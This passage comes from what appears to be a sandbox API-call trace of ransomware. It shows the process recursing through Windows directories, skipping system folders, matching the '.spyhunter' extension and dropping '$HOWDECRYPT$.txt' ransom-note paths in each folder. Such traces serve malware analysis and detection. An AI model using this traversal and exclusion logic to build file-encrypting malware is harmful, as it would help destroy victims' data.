(lpString1="VisiorWW.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.751] lstrcmpW (lpString1="VisiorWW.xml", lpString2="_uninstalling_.png") returned 1 [0084.751] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0084.751] GetProcessHeap () returned 0x2c0000 [0084.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x327908 [0084.751] GetProcessHeap () returned 0x2c0000 [0084.751] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x628) returned 0x32fc28 [0084.751] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0084.751] FindClose (in: hFindFile=0x335ea0 | out: hFindFile=0x335ea0) returned 1 [0084.752] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0084.752] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0084.752] GetProcessHeap () returned 0x2c0000 [0084.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x328828 [0084.752] GetProcessHeap () returned 0x2c0000 [0084.752] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x630) returned 0x32fc28 [0084.752] GetProcessHeap () returned 0x2c0000 [0084.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0084.752] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0084.752] FindClose (in: hFindFile=0x30b3d8 | out: hFindFile=0x30b3d8) returned 1 [0084.752] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\$HOWDECRYPT$.txt") returned 42 [0084.752] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\$HOWDECRYPT$.txt") returned 42 [0084.752] GetProcessHeap () returned 0x2c0000 [0084.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x96) returned 0x32fb30 [0084.752] GetProcessHeap () returned 0x2c0000 [0084.752] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x638) returned 0x32fc28 [0084.752] GetProcessHeap () returned 0x2c0000 [0084.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0084.752] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 0 [0084.752] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0084.753] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\$HOWDECRYPT$.txt") returned 32 [0084.753] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\$HOWDECRYPT$.txt") returned 32 [0084.753] GetProcessHeap () returned 0x2c0000 [0084.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x82) returned 0x30e4a8 [0084.753] GetProcessHeap () returned 0x2c0000 [0084.753] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x640) returned 0x32fc28 [0084.753] GetProcessHeap () returned 0x2c0000 [0084.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e9e90 | out: hHeap=0x2c0000) returned 1 [0084.753] FindNextFileW (in: hFindFile=0x2d81a8, lpFindFileData=0x298fd38 | out: lpFindFileData=0x298fd38) returned 1 [0084.753] lstrcmpiW (lpString1="pagefile.sys", lpString2="Windows") returned -1 [0084.756] lstrlenW (lpString="Windows") returned 7 [0084.756] lstrcmpiW (lpString1="pagefile.sys", lpString2="$Recycle.bin") returned 1 [0084.756] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.756] lstrcmpiW (lpString1="pagefile.sys", lpString2="System Volume Information") returned -1 [0084.756] lstrlenW (lpString="System Volume Information") returned 25 [0084.756] wnsprintfW (in: pszDest=0x2d8e40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\pagefile.sys") returned 19 [0084.756] StrStrIW (lpFirst="pagefile.sys", lpSrch=".spyhunter") returned 0x0 [0084.756] lstrcmpW (lpString1="pagefile.sys", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.756] lstrcmpW (lpString1="pagefile.sys", lpString2="_uninstalling_.png") returned 1 [0084.756] lstrlenW (lpString="\\\\?\\C:\\pagefile.sys") returned 19 [0084.756] GetProcessHeap () returned 0x2c0000 [0084.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x68) returned 0x30bee8 [0084.756] GetProcessHeap () returned 0x2c0000 [0084.756] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x648) returned 0x32fc28 [0084.756] FindNextFileW (in: hFindFile=0x2d81a8, lpFindFileData=0x298fd38 | out: lpFindFileData=0x298fd38) returned 1 [0084.756] lstrcmpiW (lpString1="PerfLogs", lpString2="Windows") returned -1 [0084.756] lstrlenW (lpString="Windows") returned 7 [0084.756] lstrcmpiW (lpString1="PerfLogs", lpString2="$Recycle.bin") returned 1 [0084.756] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.756] lstrcmpiW (lpString1="PerfLogs", lpString2="System Volume Information") returned -1 [0084.756] lstrlenW (lpString="System Volume Information") returned 25 [0084.756] wnsprintfW (in: pszDest=0x2d8e40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs") returned 15 [0084.756] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0084.756] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0084.757] GetProcessHeap () returned 0x2c0000 [0084.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e9e90 [0084.757] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\*") returned 17 [0084.757] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 0x335ea0 [0084.757] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.757] lstrlenW (lpString="Windows") returned 7 [0084.757] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.757] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.757] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.757] lstrlenW (lpString="System Volume Information") returned 25 [0084.757] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\.") returned 17 [0084.757] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.757] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0084.757] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.757] lstrlenW (lpString="Windows") returned 7 [0084.757] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.757] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.757] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.757] lstrlenW (lpString="System Volume Information") returned 25 [0084.757] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\..") returned 18 [0084.757] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.757] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.757] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0084.757] lstrcmpiW (lpString1="Admin", lpString2="Windows") returned -1 [0084.757] lstrlenW (lpString="Windows") returned 7 [0084.757] lstrcmpiW (lpString1="Admin", lpString2="$Recycle.bin") returned 1 [0084.758] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.758] lstrcmpiW (lpString1="Admin", lpString2="System Volume Information") returned -1 [0084.758] lstrlenW (lpString="System Volume Information") returned 25 [0084.758] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin") returned 21 [0084.758] lstrcmpW (lpString1="Admin", lpString2=".") returned 1 [0084.758] lstrcmpW (lpString1="Admin", lpString2="..") returned 1 [0084.758] GetProcessHeap () returned 0x2c0000 [0084.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0084.758] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\*") returned 23 [0084.758] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x335ee0 [0084.758] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.758] lstrlenW (lpString="Windows") returned 7 [0084.758] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.758] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.758] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.758] lstrlenW (lpString="System Volume Information") returned 25 [0084.758] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\.") returned 23 [0084.758] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.758] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0084.758] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.758] lstrlenW (lpString="Windows") returned 7 [0084.758] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.758] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.758] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.758] lstrlenW (lpString="System Volume Information") returned 25 [0084.758] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\..") returned 24 [0084.758] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.759] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.759] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0084.759] FindClose (in: hFindFile=0x335ee0 | out: hFindFile=0x335ee0) returned 1 [0084.759] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\$HOWDECRYPT$.txt") returned 38 [0084.759] lstrlenW (lpString="\\\\?\\C:\\PerfLogs\\Admin\\$HOWDECRYPT$.txt") returned 38 [0084.759] GetProcessHeap () returned 0x2c0000 [0084.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x8e) returned 0x330278 [0084.759] GetProcessHeap () returned 0x2c0000 [0084.759] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x650) returned 0x330310 [0084.759] GetProcessHeap () returned 0x2c0000 [0084.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0084.759] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 0 [0084.759] FindClose (in: hFindFile=0x335ea0 | out: hFindFile=0x335ea0) returned 1 [0084.759] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\$HOWDECRYPT$.txt") returned 32 [0084.759] lstrlenW (lpString="\\\\?\\C:\\PerfLogs\\$HOWDECRYPT$.txt") returned 32 [0084.759] GetProcessHeap () returned 0x2c0000 [0084.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x82) returned 0x30e538 [0084.759] GetProcessHeap () returned 0x2c0000 [0084.759] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x330310, Size=0x658) returned 0x330310 [0084.759] GetProcessHeap () returned 0x2c0000 [0084.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e9e90 | out: hHeap=0x2c0000) returned 1 [0084.759] FindNextFileW (in: hFindFile=0x2d81a8, lpFindFileData=0x298fd38 | out: lpFindFileData=0x298fd38) returned 1 [0084.760] lstrcmpiW (lpString1="Program Files", lpString2="Windows") returned -1 [0084.760] lstrlenW (lpString="Windows") returned 7 [0084.760] lstrcmpiW (lpString1="Program Files", lpString2="$Recycle.bin") returned 1 [0084.760] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.760] lstrcmpiW (lpString1="Program Files", lpString2="System Volume Information") returned -1 [0084.760] lstrlenW (lpString="System Volume Information") returned 25 [0084.760] wnsprintfW (in: pszDest=0x2d8e40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files") returned 20 [0084.760] lstrcmpW (lpString1="Program Files", lpString2=".") returned 1 [0084.760] lstrcmpW (lpString1="Program Files", lpString2="..") returned 1 [0084.760] GetProcessHeap () returned 0x2c0000 [0084.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e9e90 [0084.760] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\*") returned 22 [0084.760] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\*", lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 0x335ea0 [0084.760] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.760] lstrlenW (lpString="Windows") returned 7 [0084.760] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.760] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.760] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.760] lstrlenW (lpString="System Volume Information") returned 25 [0084.760] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\.") returned 22 [0084.760] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.760] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0084.760] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.760] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0084.760] lstrlenW (lpString="\\\\?\\C:\\Program Files\\.") returned 22 [0084.761] GetProcessHeap () returned 0x2c0000 [0084.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x6e) returned 0x330970 [0084.761] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x330310, Size=0x660) returned 0x32fbd0 [0084.761] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0084.761] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.761] lstrlenW (lpString="Windows") returned 7 [0084.761] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.761] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.761] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.761] lstrlenW (lpString="System Volume Information") returned 25 [0084.761] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\..") returned 23 [0084.761] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.761] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.761] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0084.761] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.761] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0084.761] lstrlenW (lpString="\\\\?\\C:\\Program Files\\..") returned 23 [0084.761] GetProcessHeap () returned 0x2c0000 [0084.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3309e8 [0084.761] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fbd0, Size=0x668) returned 0x32fbd0 [0084.761] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0084.761] lstrcmpiW (lpString1="Common Files", lpString2="Windows") returned -1 [0084.761] lstrlenW (lpString="Windows") returned 7 [0084.761] lstrcmpiW (lpString1="Common Files", lpString2="$Recycle.bin") returned 1 [0084.761] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.761] lstrcmpiW (lpString1="Common Files", lpString2="System Volume Information") returned -1 [0084.761] lstrlenW (lpString="System Volume Information") returned 25 [0084.762] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files") returned 33 [0084.762] lstrcmpW (lpString1="Common Files", lpString2=".") returned 1 [0084.762] lstrcmpW (lpString1="Common Files", lpString2="..") returned 1 [0084.762] GetProcessHeap () returned 0x2c0000 [0084.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0084.762] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\*") returned 35 [0084.762] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x335ee0 [0084.762] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.762] lstrlenW (lpString="Windows") returned 7 [0084.762] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.762] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.762] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.762] lstrlenW (lpString="System Volume Information") returned 25 [0084.762] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\.") returned 35 [0084.762] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.762] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0084.762] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.762] lstrlenW (lpString="Windows") returned 7 [0084.766] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.766] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.766] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.766] lstrlenW (lpString="System Volume Information") returned 25 [0084.766] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\..") returned 36 [0084.766] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.766] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.766] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0084.766] lstrcmpiW (lpString1="DESIGNER", lpString2="Windows") returned -1 [0084.766] lstrlenW (lpString="Windows") returned 7 [0084.766] lstrcmpiW (lpString1="DESIGNER", lpString2="$Recycle.bin") returned 1 [0084.766] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.766] lstrcmpiW (lpString1="DESIGNER", lpString2="System Volume Information") returned -1 [0084.766] lstrlenW (lpString="System Volume Information") returned 25 [0084.766] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER") returned 42 [0084.766] lstrcmpW (lpString1="DESIGNER", lpString2=".") returned 1 [0084.766] lstrcmpW (lpString1="DESIGNER", lpString2="..") returned 1 [0084.766] GetProcessHeap () returned 0x2c0000 [0084.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0084.766] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*") returned 44 [0084.767] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335f20 [0084.767] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.767] lstrlenW (lpString="Windows") returned 7 [0084.767] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.767] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.767] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.767] lstrlenW (lpString="System Volume Information") returned 25 [0084.767] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\.") returned 44 [0084.767] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.767] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.767] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.767] lstrlenW (lpString="Windows") returned 7 [0084.767] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.767] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.767] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.767] lstrlenW (lpString="System Volume Information") returned 25 [0084.767] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\..") returned 45 [0084.767] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.767] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.767] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.767] lstrcmpiW (lpString1="MSADDNDR.DLL", lpString2="Windows") returned -1 [0084.767] lstrlenW (lpString="Windows") returned 7 [0084.767] lstrcmpiW (lpString1="MSADDNDR.DLL", lpString2="$Recycle.bin") returned 1 [0084.767] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.768] lstrcmpiW (lpString1="MSADDNDR.DLL", lpString2="System Volume Information") returned -1 [0084.768] lstrlenW (lpString="System Volume Information") returned 25 [0084.768] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 55 [0084.768] StrStrIW (lpFirst="MSADDNDR.DLL", lpSrch=".spyhunter") returned 0x0 [0084.768] lstrcmpW (lpString1="MSADDNDR.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.768] lstrcmpW (lpString1="MSADDNDR.DLL", lpString2="_uninstalling_.png") returned 1 [0084.768] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 55 [0084.768] GetProcessHeap () returned 0x2c0000 [0084.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb0) returned 0x329dd8 [0084.768] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fbd0, Size=0x670) returned 0x32fbd0 [0084.768] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0084.768] FindClose (in: hFindFile=0x335f20 | out: hFindFile=0x335f20) returned 1 [0084.768] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\$HOWDECRYPT$.txt") returned 59 [0084.768] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\$HOWDECRYPT$.txt") returned 59 [0084.768] GetProcessHeap () returned 0x2c0000 [0084.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb8) returned 0x330a60 [0084.768] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fbd0, Size=0x678) returned 0x32fbd0 [0084.768] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0084.768] lstrcmpiW (lpString1="Microsoft Shared", lpString2="Windows") returned -1 [0084.768] lstrlenW (lpString="Windows") returned 7 [0084.768] lstrcmpiW (lpString1="Microsoft Shared", lpString2="$Recycle.bin") returned 1 [0084.768] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.768] lstrcmpiW (lpString1="Microsoft Shared", lpString2="System Volume Information") returned -1 [0084.768] lstrlenW (lpString="System Volume Information") returned 25 [0084.768] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared") returned 50 [0084.768] lstrcmpW (lpString1="Microsoft Shared", lpString2=".") returned 1 [0084.768] lstrcmpW (lpString1="Microsoft Shared", lpString2="..") returned 1 [0084.769] GetProcessHeap () returned 0x2c0000 [0084.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0084.769] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*") returned 52 [0084.769] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335f20 [0084.769] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.769] lstrlenW (lpString="Windows") returned 7 [0084.769] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.769] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.769] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.769] lstrlenW (lpString="System Volume Information") returned 25 [0084.769] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\.") returned 52 [0084.769] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.769] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.769] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.769] lstrlenW (lpString="Windows") returned 7 [0084.769] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.769] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.769] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.769] lstrlenW (lpString="System Volume Information") returned 25 [0084.769] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\..") returned 53 [0084.769] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.769] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.769] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.770] lstrcmpiW (lpString1="DW", lpString2="Windows") returned -1 [0084.770] lstrlenW (lpString="Windows") returned 7 [0084.770] lstrcmpiW (lpString1="DW", lpString2="$Recycle.bin") returned 1 [0084.770] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.770] lstrcmpiW (lpString1="DW", lpString2="System Volume Information") returned -1 [0084.770] lstrlenW (lpString="System Volume Information") returned 25 [0084.770] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW") returned 53 [0084.770] lstrcmpW (lpString1="DW", lpString2=".") returned 1 [0084.770] lstrcmpW (lpString1="DW", lpString2="..") returned 1 [0084.770] GetProcessHeap () returned 0x2c0000 [0084.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0084.770] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*") returned 55 